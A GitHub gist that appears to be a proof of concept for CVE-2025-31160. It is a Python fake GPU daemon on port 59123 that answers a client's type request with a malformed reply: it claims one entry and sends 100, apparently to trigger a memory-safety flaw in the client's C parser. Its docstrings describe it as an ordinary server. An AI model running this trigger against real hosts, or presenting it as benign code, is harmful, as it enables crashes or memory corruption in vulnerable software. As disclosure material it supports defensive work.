Skip to content

Instantly share code, notes, and snippets.

@kallsyms
Created March 29, 2025 23:16
Show Gist options
  • Save kallsyms/3acdf857ccc5c9fbaae7ed823be0365e to your computer and use it in GitHub Desktop.
Save kallsyms/3acdf857ccc5c9fbaae7ed823be0365e to your computer and use it in GitHub Desktop.
Bismuth CVE-2025-31160
import socket
import struct
import threading
import time
# Default TCP port the server binds to on the loopback interface.
GPUDPORT = 59123
# Protocol version byte: required in the request and echoed in the reply prelude.
APIVERSION = 1


class GPUDServer:
    """Small threaded TCP server that answers a GPU "type" request.

    A client sends two bytes: ``b'T'`` followed by ``APIVERSION``. The server
    replies with a 4-byte big-endian prelude (version in the top byte, payload
    length in the low 24 bits) followed by the payload returned by
    ``get_gpu_type_info()``, then closes the connection.
    """

    def __init__(self, port=GPUDPORT):
        """Store configuration; no socket is opened until ``start()``.

        Args:
            port: TCP port to bind on 127.0.0.1.
        """
        self.port = port
        self.server_socket = None
        self.running = False
        # (socket, address, thread) for every accepted connection.
        self.clients = []

    def start(self):
        """Start the GPUD server.

        Binds to 127.0.0.1 on ``self.port``, starts listening and launches a
        daemon thread running ``accept_connections``.

        Returns:
            The accept thread, so the caller can ``join`` it on shutdown.

        Raises:
            OSError: if the socket cannot be configured, bound or put into
                listening mode (the socket is closed before re-raising).
        """
        listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        try:
            listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
            listener.bind(('127.0.0.1', self.port))
            listener.listen(5)
        except OSError:
            # Do not leak the descriptor or publish a half-initialised socket.
            listener.close()
            raise
        self.server_socket = listener
        self.running = True
        print(f"GPUD Server started on port {self.port}")
        # Start accepting client connections
        accept_thread = threading.Thread(
            target=self.accept_connections,
            daemon=True,
        )
        accept_thread.start()
        return accept_thread

    def accept_connections(self):
        """Accept incoming client connections until stopped.

        Each accepted connection is served by its own daemon thread and
        recorded in ``self.clients``. The loop ends when ``self.running``
        becomes false or ``accept()`` fails with ``OSError``.
        """
        while self.running:
            try:
                client_socket, address = self.server_socket.accept()
            except OSError:
                # accept() failed on the listening socket (for example after
                # stop() closed it); leave the loop.
                break
            print(f"Client connected: {address}")
            # Start a new thread to handle this client
            client_thread = threading.Thread(
                target=self.handle_client,
                args=(client_socket, address),
                daemon=True,
            )
            client_thread.start()
            self.clients.append((client_socket, address, client_thread))

    @staticmethod
    def _recv_exact(sock, count):
        """Read *count* bytes from *sock*, returning fewer only on EOF."""
        chunks = []
        remaining = count
        while remaining > 0:
            chunk = sock.recv(remaining)
            if not chunk:
                # Peer closed (or shut down writing) before sending everything.
                break
            chunks.append(chunk)
            remaining -= len(chunk)
        return b"".join(chunks)

    def handle_client(self, client_socket, address):
        """Handle one client connection and process its request.

        Args:
            client_socket: connected stream socket; always closed on return.
            address: peer address, used only in log messages.

        Any exception raised while serving the client is reported with
        ``print`` and not propagated.
        """
        try:
            # Receive the 'T' and APIVERSION from client. A stream socket may
            # deliver the two bytes separately, so read until both arrive.
            request = self._recv_exact(client_socket, 2)
            print("REQ", request)
            if request == bytes((ord('T'), APIVERSION)):
                print(f"Received valid type request from {address}")
                # Encode once so the advertised length is the number of bytes
                # actually written to the wire, not the number of characters.
                payload = self.get_gpu_type_info().encode('utf-8')
                # Prelude: version (1 byte) + length (3 bytes), packed as a
                # single big-endian uint32. Lengths above 24 bits are masked.
                prelude = struct.pack(
                    '>I', (APIVERSION << 24) | (len(payload) & 0xFFFFFF)
                )
                client_socket.sendall(prelude)
                client_socket.sendall(payload)
                print(f"Sent response to {address}")
            else:
                print(f"Invalid request from {address}")
        except Exception as e:
            # Per-connection boundary: report and drop the connection.
            print(f"Error handling client {address}: {e}")
        finally:
            client_socket.close()

    def get_gpu_type_info(self):
        """Generate GPU type information to send to client.

        Returns:
            The string ``"1@"`` followed by 100 repetitions of ``"a b c@"``.

        Format should match what gputype_parse() in the C code expects.
        NOTE(review): the leading "1" presumably is an entry count that does
        not match the 100 entries that follow; confirm against the C parser.
        """
        return "1@" + ("a b c@" * 100)

    def stop(self):
        """Stop the server and close all connections."""
        self.running = False
        # Close all client connections
        for client_socket, _, _ in self.clients:
            try:
                client_socket.close()
            except OSError:
                # Best-effort shutdown: an error on close is not actionable.
                pass
        # Close server socket
        if self.server_socket:
            self.server_socket.close()
        print("GPUD Server stopped")
def main():
    """Run a GPUDServer in the foreground until Ctrl+C, then shut it down."""
    gpud = GPUDServer()
    acceptor = gpud.start()
    try:
        try:
            # Idle here; the thread returned by start() does the accepting.
            while True:
                time.sleep(1)
        except KeyboardInterrupt:
            print("Shutting down server...")
    finally:
        gpud.stop()
        # Wait a bounded time for the accept loop to finish.
        acceptor.join(timeout=2)


if __name__ == "__main__":
    main()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment